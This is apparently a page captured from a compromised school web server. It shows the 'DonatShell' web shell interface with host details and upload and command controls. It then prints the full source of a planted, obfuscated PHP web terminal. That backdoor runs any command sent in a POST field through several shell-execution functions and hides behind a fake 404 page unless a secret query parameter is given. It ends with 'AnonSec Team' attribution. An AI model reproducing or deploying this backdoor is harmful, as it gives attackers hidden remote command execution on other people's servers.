%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : kowitt.ac.th  /  Your IP : 216.73.216.11
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/activity/20190114-140747/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/inetpub/wwwroot/activity/20190114-140747/test/WebTerminal-@LaravelHUB.php
<?php
goto rwfbp;
n6p2z:
$output = '';
goto myxXd;
uZxYj:
function executeCommand($command)
{
    if (!isSafeCommand($command)) {
        return "\103\x6f\155\x6d\x61\156\144\x20\142\x6c\x6f\x63\153\145\x64\40\x62\171\40\x73\x65\143\165\x72\x69\164\171\40\x70\x6f\x6c\151\x63\171";
    }
    $methods = array("\163\150\x65\x6c\154\137\145\170\145\143" => function ($c) {
        return shell_exec($c . "\40\x32\76\x26\x31");
    }, "\145\x78\x65\143" => function ($c) {
        exec($c . "\40\62\x3e\46\x31", $o);
        return implode("\xa", $o);
    }, "\x73\x79\x73\x74\x65\155" => function ($c) {
        ob_start();
        system($c . "\40\62\76\x26\61");
        return ob_get_clean();
    }, "\x70\x61\163\x73\164\x68\x72\165" => function ($c) {
        ob_start();
        passthru($c . "\x20\x32\x3e\x26\x31");
        return ob_get_clean();
    }, "\x70\x72\x6f\143\x5f\157\160\x65\x6e" => function ($c) {
        $descriptors = array(0 => array("\x70\151\x70\x65", "\x72"), 1 => array("\x70\151\160\x65", "\x77"), 2 => array("\160\x69\x70\x65", "\167"));
        $process = @proc_open($c, $descriptors, $pipes);
        if (!is_resource($process)) {
            return false;
        }
        $output = stream_get_contents($pipes[1]);
        $errors = stream_get_contents($pipes[2]);
        proc_close($process);
        return $output . $errors;
    }, "\x70\x6f\160\x65\x6e" => function ($c) {
        $handle = @popen($c . "\40\62\76\46\61", "\162");
        if (!$handle) {
            return false;
        }
        $output = '';
        while (!feof($handle)) {
            $output .= fread($handle, 4096);
        }
        pclose($handle);
        return $output;
    });
    foreach ($methods as $method => $callback) {
        if (function_exists($method)) {
            $result = $callback($command);
            if ($result !== false && $result !== null) {
                return $result;
            }
        }
    }
    $fileBasedCommands = array("\x6c\163" => function () {
        return implode("\12", scandir("\56"));
    }, "\x70\167\144" => function () {
        return getcwd();
    }, "\167\x68\157\141\155\x69" => function () {
        return get_current_user();
    }, "\165\156\141\155\x65" => function () {
        return php_uname();
    }, "\x70\x68\160\x20\55\x76" => function () {
        return phpversion();
    }, "\144\141\x74\x65" => function () {
        return date("\131\55\x6d\x2d\x64\x20\110\x3a\x69\72\163");
    });
    if (isset($fileBasedCommands[$command])) {
        return $fileBasedCommands[$command]();
    }
    if ($command === "\x66\162\145\x65\x20\x2d\x6d" && file_exists("\57\160\x72\x6f\143\57\x6d\145\x6d\151\x6e\146\x6f")) {
        return file_get_contents("\x2f\160\162\x6f\x63\x2f\x6d\145\x6d\151\156\x66\x6f");
    }
    if (function_exists("\163\x68\145\154\x6c\137\145\x78\145\x63") && !ini_get("\x73\141\146\145\x5f\x6d\x6f\144\145")) {
        $result = `{$command} 2>&1`;
        if (!empty($result)) {
            return $result;
        }
    }
    return "\103\157\x6d\x6d\141\x6e\x64\40\x65\x78\145\x63\165\164\x69\x6f\156\x20\x66\x61\151\154\x65\x64\x20\x28\141\x6c\x6c\x20\x6d\145\164\150\x6f\144\x73\x20\x64\151\x73\x61\142\154\x65\144\x29";
}
goto n6p2z;
JXXX1:
set_time_limit(30);
goto XFnaa;
DgXlh:
if (isset($_GET["\147\x6f\143\x6d\144"])) { ?>
    <!doctypehtml>
        <html>

        <head>
            <meta charset="UTF-8">
            <meta content="width=device-width,initial-scale=1" name="viewport">
            <title>Web Terminal</title>
            <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
            <style>
                body {
                    background-color: #1e1e1e;
                    color: #e0e0e0
                }

                .terminal-container {
                    background-color: #000;
                    border-radius: 5px;
                    padding: 15px;
                    height: 70vh;
                    overflow-y: auto;
                    font-family: monospace
                }

                .prompt {
                    color: #4caf50
                }

                .command-input {
                    border: none;
                    color: #fff;
                    width: 80%;
                    outline: 0
                }

                .output {
                    white-space: pre-wrap;
                    margin: 5px 0
                }
            </style>
        </head>

        <body>
            <div class="container mt-3">
                <div class="text-center">
                    <h3 class="text-center">Web Terminal</h3>
                    <p>Programing by Alireza | @Special_One</p>
                </div>
                <div class="terminal-container" id="terminal">
                    <div class="output">Web Terminal - Enter commands below</div><?php if (!empty($output)) { ?>
                        <div class="output"><span class="prompt">$</span><?php echo htmlspecialchars($_POST["\x63\x6d\x64"], ENT_QUOTES); ?>
                        </div>
                        <div class="output"><?php echo $output; ?>
                        </div><?php  } ?>
                </div>
                <form class="mt-2" method="post">
                    <div class="input-group"><span class="prompt input-group-text">$</span> <input autocomplete="off" autofocus class="command-input form-control" name="cmd" required> <button class="btn btn-success" type="submit">Run</button></div>
                </form>
            </div>
            <script>
                const terminal = document.getElementById('terminal');
                if (terminal) terminal.scrollTop = terminal.scrollHeight;


                const cmdInput = document.querySelector('[name="cmd"]');
                let history = [];
                let historyPos = 0;

                cmdInput.addEventListener('keydown', (e) => {
                    if (e.key === 'ArrowUp') {
                        if (historyPos < history.length) {
                            e.preventDefault();
                            cmdInput.value = history[historyPos++];
                        }
                    } else if (e.key === 'ArrowDown') {
                        if (historyPos > 0) {
                            e.preventDefault();
                            cmdInput.value = history[--historyPos];
                        }
                    } else if (e.key === 'Enter') {
                        history.unshift(cmdInput.value);
                        historyPos = 0;
                    }
                });
            </script>
        </body>

        </html><?php  } else {
                echo "\12\74\41\x44\117\x43\124\x59\x50\x45\40\x48\x54\x4d\x4c\40\120\125\102\114\111\x43\x20\x22\55\57\x2f\111\105\124\x46\57\x2f\104\x54\x44\40\x48\x54\x4d\114\40\x32\x2e\x30\57\x2f\x45\x4e\x22\x3e\xa\74\x68\x74\x6d\x6c\76\x3c\x68\145\x61\144\76\12\x3c\164\x69\164\154\145\76\x34\x30\x34\40\x4e\157\164\x20\106\157\x75\156\144\x3c\x2f\164\151\x74\154\x65\76\xa\x3c\57\150\145\141\144\76\x3c\142\157\144\x79\x3e\12\74\x68\x31\x3e\116\x6f\164\x20\x46\157\x75\x6e\x64\x3c\x2f\150\x31\76\12\74\x70\76\x54\x68\x65\x20\162\145\x71\165\145\163\164\x65\144\40\125\x52\114\40\x77\141\x73\40\x6e\157\x74\40\146\157\x75\x6e\144\x20\x6f\156\40\164\150\x69\163\40\163\x65\x72\x76\x65\162\x2e\x3c\x2f\x70\76\12\74\160\x3e\101\x64\x64\x69\164\x69\157\x6e\141\x6c\154\171\54\x20\141\40\x34\x30\x34\x20\x4e\157\164\x20\106\157\x75\x6e\144\12\145\x72\x72\157\162\40\x77\141\163\40\145\156\x63\x6f\165\156\164\x65\x72\145\x64\40\167\x68\151\x6c\145\x20\164\x72\x79\151\x6e\147\x20\164\x6f\40\x75\x73\145\x20\x61\x6e\x20\105\162\x72\x6f\162\104\x6f\143\x75\x6d\x65\x6e\164\x20\164\x6f\x20\150\x61\x6e\144\154\x65\x20\x74\150\x65\x20\162\145\161\x75\x65\163\164\56\x3c\x2f\x70\x3e";
            }
            goto qysjA;
            myxXd:
            if (isset($_POST["\143\155\144"])) {
                $output = executeCommand($_POST["\143\x6d\144"]);
                $output = htmlspecialchars($output, ENT_QUOTES, "\125\124\x46\x2d\x38");
            }
            goto DgXlh;
            rwfbp:
            error_reporting(0);
            goto JXXX1;
            XFnaa:
            function isSafeCommand($cmd)
            {
                $blacklist = array("\162\x6d\40", "\x6d\166\x20", "\x64\x64\x20", "\x73\x68\x75\164\x64\157\x77\156", "\x72\145\142\157\157\x74", "\x68\141\x6c\164", "\x3e", "\x7c", "\46", "\73", "\140", "\x24", "\x28", "\x29", "\x7b", "\x7d", "\x63\x68\155\x6f\x64", "\x63\150\157\167\x6e", "\167\x67\145\164", "\143\165\x72\x6c", "\146\164\x70", "\163\163\150");
                foreach ($blacklist as $forbidden) {
                    if (strpos($cmd, $forbidden) !== false) {
                        return false;
                    }
                }
                return true;
            }
            goto uZxYj;
            qysjA: ?>

Anon7 - 2022
AnonSec Team